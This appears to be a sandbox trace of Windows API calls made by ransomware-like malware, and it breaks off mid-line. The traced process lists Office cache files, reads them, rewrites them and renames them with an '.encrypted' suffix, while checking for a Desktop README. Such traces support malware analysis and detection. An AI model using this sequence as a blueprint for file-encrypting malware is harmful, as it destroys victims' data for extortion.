1 [0190.219] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0190.219] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0190.220] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.xml", cAlternateFileName="")) returned 1 [0190.220] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0190.220] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0190.220] FindClose (in: hFindFile=0x94ef030 | out: hFindFile=0x94ef030) returned 1 [0190.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0190.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0190.221] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0190.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0190.221] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0190.222] GetFileType (hFile=0x2d8) returned 0x1 [0190.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0190.222] GetFileType (hFile=0x2d8) returned 0x1 [0190.222] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x32b [0190.222] ReadFile (in: hFile=0x2d8, lpBuffer=0x229e84c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x229e84c*, lpNumberOfBytesRead=0x2ee7d4*=0x32b, lpOverlapped=0x0) returned 1 [0190.224] CloseHandle (hObject=0x2d8) returned 1 [0190.240] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0190.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0190.240] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0190.240] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0190.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0190.240] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0190.241] GetFileType (hFile=0x2d8) returned 0x1 [0190.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0190.241] GetFileType (hFile=0x2d8) returned 0x1 [0190.241] WriteFile (in: hFile=0x2d8, lpBuffer=0x22ed854*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x22ed854*, lpNumberOfBytesWritten=0x2ee798*=0x330, lpOverlapped=0x0) returned 1 [0190.242] CloseHandle (hObject=0x2d8) returned 1 [0190.243] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0190.243] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.encrypted", lpFilePart=0x0) returned 0x55 [0190.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0190.243] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x57075ec0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x330)) returned 1 [0190.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0190.244] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.encrypted")) returned 1 [0190.245] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0190.245] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0190.245] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0190.245] GetFileType (hFile=0x2d8) returned 0x1 [0190.245] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0190.245] GetFileType (hFile=0x2d8) returned 0x1 [0190.245] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x16fc [0190.245] ReadFile (in: hFile=0x2d8, lpBuffer=0x22eeba8, nNumberOfBytesToRead=0x16fc, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x22eeba8*, lpNumberOfBytesRead=0x2ee7d4*=0x16fc, lpOverlapped=0x0) returned 1 [0190.251] CloseHandle (hObject=0x2d8) returned 1 [0190.268] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0190.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0190.268] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0190.268] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0190.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0190.268] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0190.269] GetFileType (hFile=0x2d8) returned 0x1 [0190.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0190.269] GetFileType (hFile=0x2d8) returned 0x1 [0190.269] WriteFile (in: hFile=0x2d8, lpBuffer=0x2342c54*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x2342c54*, lpNumberOfBytesWritten=0x2ee7c4*=0x1700, lpOverlapped=0x0) returned 1 [0190.270] CloseHandle (hObject=0x2d8) returned 1 [0190.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0190.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0190.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0190.271] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x570c2180, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1700)) returned 1 [0190.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0190.272] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0190.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0190.273] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpFilePart=0x0) returned 0x47 [0190.273] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpFilePart=0x0) returned 0x48 [0190.273] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ef130 [0190.273] FindNextFileW (in: hFindFile=0x94ef130, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0190.274] FindNextFileW (in: hFindFile=0x94ef130, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0190.274] FindNextFileW (in: hFindFile=0x94ef130, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0190.274] FindNextFileW (in: hFindFile=0x94ef130, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0190.274] FindNextFileW (in: hFindFile=0x94ef130, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0190.274] FindClose (in: hFindFile=0x94ef130 | out: hFindFile=0x94ef130) returned 1 [0190.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0190.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0190.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7f8) returned 1 [0190.274] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpFilePart=0x0) returned 0x47 [0190.274] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpFilePart=0x0) returned 0x48 [0190.274] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x2ee520 | out: lpFindFileData=0x2ee520*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ef130 [0190.275] FindNextFileW (in: hFindFile=0x94ef130, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0190.275] FindNextFileW (in: hFindFile=0x94ef130, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0190.275] FindNextFileW (in: hFindFile=0x94ef130, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0190.275] FindNextFileW (in: hFindFile=0x94ef130, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0190.275] FindNextFileW (in: hFindFile=0x94ef130, lpFindFileData=0x2ee530 | out: lpFindFileData=0x2ee530*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0190.275] FindClose (in: hFindFile=0x94ef130 | out: hFindFile=0x94ef130) returned 1 [0190.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7b8) returned 1 [0190.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0190.276] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2ee1ec, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", lpFilePart=0x0) returned 0x51 [0190.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6e0) returned 1 [0190.276] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0190.276] GetFileType (hFile=0x2d8) returned 0x1 [0190.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6dc) returned 1 [0190.277] GetFileType (hFile=0x2d8) returned 0x1 [0190.277] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee7e8 | out: lpFileSizeHigh=0x2ee7e8*=0x0) returned 0xaf35ed [0190.306] ReadFile (in: hFile=0x2d8, lpBuffer=0x148deb98, nNumberOfBytesToRead=0xaf35ed, lpNumberOfBytesRead=0x2ee794, lpOverlapped=0x0 | out: lpBuffer=0x148deb98*, lpNumberOfBytesRead=0x2ee794*=0xaf35ed, lpOverlapped=0x0) returned 1 [0190.660] CloseHandle (hObject=0x2d8) returned 1 [0191.470] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0191.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0191.470] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee7dc | out: lpFileInformation=0x2ee7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0191.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0191.470] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", nBufferLength=0x105, lpBuffer=0x2ee1d4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", lpFilePart=0x0) returned 0x51 [0191.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6c8) returned 1 [0191.471] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all 